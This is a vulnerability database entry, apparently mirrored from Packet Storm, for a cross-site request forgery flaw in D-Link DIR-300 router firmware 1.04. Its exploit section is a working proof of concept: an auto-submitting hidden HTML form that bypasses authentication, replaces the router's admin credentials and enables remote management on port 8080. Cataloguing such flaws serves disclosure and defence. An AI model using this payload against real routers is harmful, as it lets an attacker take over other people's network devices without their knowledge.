ID
VAR-E-201012-0955
TITLE
D-Link DIR-300 Cross Site Request Forgery
Trust: 0.5
DESCRIPTION
D-Link DIR-300 suffers from a cross site request forgery vulnerability.
Trust: 0.5
AFFECTED PRODUCTS
vendor: | d link | model: | dir-300 | scope: | - | version: | - | Trust: 0.5 |
EXPLOIT
<!--
[+] Title: D-Link DIR-300 CSRF Vuln. (Change Admin Account Settings) PoC Exploit
[+] Description: Enable Remote Menagement for specific IP
[+] Firmware Version: 1.04
[+] Note: No need administrator to be logged (:
[+] Author: outlaw.dll
[+] Date: 17.12.2010
[+] Tested on: Windows 7 Ultimate (Google Chrome) but will work in any other OS
This firmware version is full of CSRF and other type of vulnerabilities.
W_o.O_W
-->
<form name="exploit" action="http://server/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0" method="post">
<input type="hidden" name="ACTION_POST" value="1" />
<input type="hidden" name="admin_name" value="outlaw.dll" />
<input type="hidden" name="admin_password1" value="1337" />
<input type="hidden" name="admin_password2" value="1337" />
<input type="hidden" name="rt_enable_h" value="1" />
<input type="hidden" name="rt_port" value="8080" />
<input type="hidden" name="rt_ipaddr" value="192.168.0.1337" />
</form>
<script>document.exploit.submit();</script>
Trust: 0.5
EXPLOIT HASH
LOCAL | SOURCE | ||||||||
|
|
Trust: 0.5
PRICE
free
Trust: 0.5
TYPE
csrf
Trust: 0.5
TAGS
tag: | exploit | Trust: 0.5 |
tag: | csrf | Trust: 0.5 |
CREDITS
outlaw.dll
Trust: 0.5
EXTERNAL IDS
db: | PACKETSTORM | id: | 96777 | Trust: 0.5 |
SOURCES
db: | PACKETSTORM | id: | 96777 |
LAST UPDATE DATE
2022-07-27T09:45:35.220000+00:00
SOURCES RELEASE DATE
db: | PACKETSTORM | id: | 96777 | date: | 2010-12-17T20:03:37 |